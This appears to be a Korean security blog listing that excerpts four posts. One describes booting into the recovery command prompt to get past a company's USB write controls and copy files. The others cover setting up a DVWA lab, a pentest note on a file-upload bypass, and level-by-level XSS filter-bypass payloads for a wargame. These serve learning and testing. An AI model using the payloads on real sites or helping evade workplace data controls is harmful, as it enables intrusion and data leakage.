Hacking/Pentest Sites(4)
-
매체제어 우회 - 명령프롬프트 부팅
사내 보안프로그램으로 일반 USB에 쓰기가 안될때, 명령프롬프트 부팅을 이용하면됨 1. 명령프롬프트 부팅 1-1. SHIFT를 누르면서 다시시작 클릭 1-2. 문제 해결 클릭 1-3. 명령 프롬프트 클릭 2. USB PC에 삽입 3. 명령프롬프트 명령어로 USB 파일을 복사함 3-1. d: 를 타이핑해서 드라이브 이동해 dir 명령어로파일 이름 파악 3-2. xcopy 파일 이름 c: 명령어로 USB의 파일을 c드라이브로 이동 4. 다시 재부팅하면 c드라이브에 복사한 파일 확인됨
2021.06.16 -
[DVWA] Autoset을 이용한 DVWA 웹서버 구축
0. 환경 window10 pro 1. 다운로드 1-1. DVWA http://www.dvwa.co.uk/ DVWA - Damn Vulnerable Web Application www.dvwa.co.uk 1-2. Apache/MySQL/PHP 구성 - Autoset http://www.autoset.net/xe/download_autoset_9_0_0 오토셋 9.0 다운로드 AutoSet 유지보수 종료 안내 1. 오토셋에 대한 유지보수 계획이 없기에 사용자분들께 이 내용을 알려드립니다. 2. 현재 사이트를 통해 제공되는 버전이 최종 버전이며, 더 이상의 업그레이드가 없 www.autoset.net 2. Autoset 설치 진행 2-1. autoset 설치 후 웹서버, MySQL 시작 버튼 클릭 2-2. ..
2020.10.29 -
'파일업로드 취약점' 선정 시 유의사항 - 우회 업로드한 파일 확인
- 취약점 명 : 파일 업로드 - 프로젝트 기간 : 20.09.14 ~ 20.09.25 - 수행 내용 : JSP파일(test.jsp) 업로드 필터링 되어 프록시로 우회 1. 글쓰기페이지 응답패킷에서 알림창 로직 삭제 2. 게시 글 업로드 시 패킷을 '[Fail]'에서 '이전에 정상 파일(img.jpg) 업로드 시 메시지'로 조작 - 결과 : 해당 파일(tes.jsp)이 업로드 된것처럼 보이나, 다운받아 본 결과 2번에서 조작한 메시지 때 업로드한 파일(img.jpg)이 업로드 됬음
2020.09.28 -
alert 1337 to win
level1 ?name= level2 ?name= level3 ?name=zxm%0a %0A : Line Feed level4 img 태그 이용 ?img=x%27%20onerror=%27alert(1377) level5 ?name=zxm&action=javascript:alert(1337) level6 필터링 우회 ?name=zxm\u003cscript\u003ealert(1337)\u003c/script\u003e \u003c : 유니코드로 번역하면 ?name=zxm level7 double encording ?name=zxm%253cscript%253ealert%25281337%2529%253c%252fscript%253e '' ----%encording---> '%..
2020.09.11